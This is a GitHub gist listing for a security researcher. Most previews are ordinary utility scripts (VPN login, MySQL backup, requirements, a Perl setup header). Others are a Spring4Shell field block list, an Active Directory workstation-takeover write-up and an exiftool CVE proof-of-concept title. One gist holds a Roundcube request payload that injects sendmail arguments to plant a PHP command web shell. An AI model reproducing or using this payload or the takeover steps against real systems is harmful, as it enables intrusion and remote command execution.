Skip to content

Instantly share code, notes, and snippets.

Avatar
:atom:

Ihebski ihebski

:atom:
  • Error: Unable to resolve
View GitHub Profile
View gist:13c69f0badb50b8bbb76b92e6f7517f0
// shared by @Retrospected: https://github.com/Retrospected/spring-rce-poc
@InitBinder
public void initBinder(WebDataBinder binder) {
String[] blackList = {"class.*","Class.*","*.class.*",".*Class.*"};
binder.setDisallowedFields(blackList);
}
@ihebski
ihebski / vpn.sh
Created Mar 19, 2022
auto connect to vpn
View vpn.sh
#!/usr/bin/expect -f
# Constants
set user ""
set pass ""
set timeout -1
# Options
match_max 100000
log_user 0
@ihebski
ihebski / mysql-backup.sh
Created Dec 27, 2021
backup and restore mysql database from defectdojo container
View mysql-backup.sh
# Get container id
docker ps | grep mysql
# Backup
docker exec -it <container_id> mysqldump -u defectdojo --password=defectdojo defectdojo > backup.sql
# Restore
docker exec -i <container_id> mysql -u defectdojo --password=defectdojo defectdojo < cat backup.sql
View requirement.txt
certifi==2021.5.30
charset-normalizer==2.0.6
click==8.0.1
Flask==2.0.1
Flask-SQLAlchemy==2.5.1
greenlet==1.1.1
idna==3.2
itsdangerous==2.0.1
Jinja2==3.0.1
MarkupSafe==2.0.1
@ihebski
ihebski / Workstation-Takeover.md
Created Jul 28, 2021 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
View Workstation-Takeover.md

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

View 100.release-setup
#!/usr/bin/env perl
# Help the initial setup of configurable parameters.
# If not yet available, create/update a generic $home/lib/setup-generic
# Also, create/update a release specific config $home/lib/setup-$version
# Chicken' egg situation: the parameters may have been passed to the
# install script, but we may not have the required module installed to
# process it. The values were passed via environment variables.
use warnings;
@ihebski
ihebski / exiftool.md
Last active May 18, 2021
exiftool exploit POC - CVE-2021-22204
View exiftool.md

exiftool exploit : CVE-2021-22204

View gist:c5c800f3b47b6321639d3562e03ba49b
_token=VufHk5rpfJAVvw0SYqCYDZVUK4pKbgVy&_task=mail&_action=send&_id=19306581945fb451c9405a8&_attachments=&_from=example@example.com -OQueueDirectory=/tmp -X/var/www/html/roundcube/backdoor4.php&_to=example@pWnexAmplE.sh&_cc=&_bcc=&_replyto=&_followupto=&_subject=<?php echo passthru($_GET['cmd']); ?>&editorSelector=plain&_priority=0&_store_target=&_draft_saveid=&_draft=&_is_html=0&_framed=1&_message=pwn
View gist:3073daff8e831ae899ab9049d57a651e
import re
from furl import furl
def param_extract(response, level, black_list, placeholder):
'''
regexp : r'.*?:\/\/.*\?.*\=[^$]'
regexp : r'.*?:\/\/.*\?.*\='
'''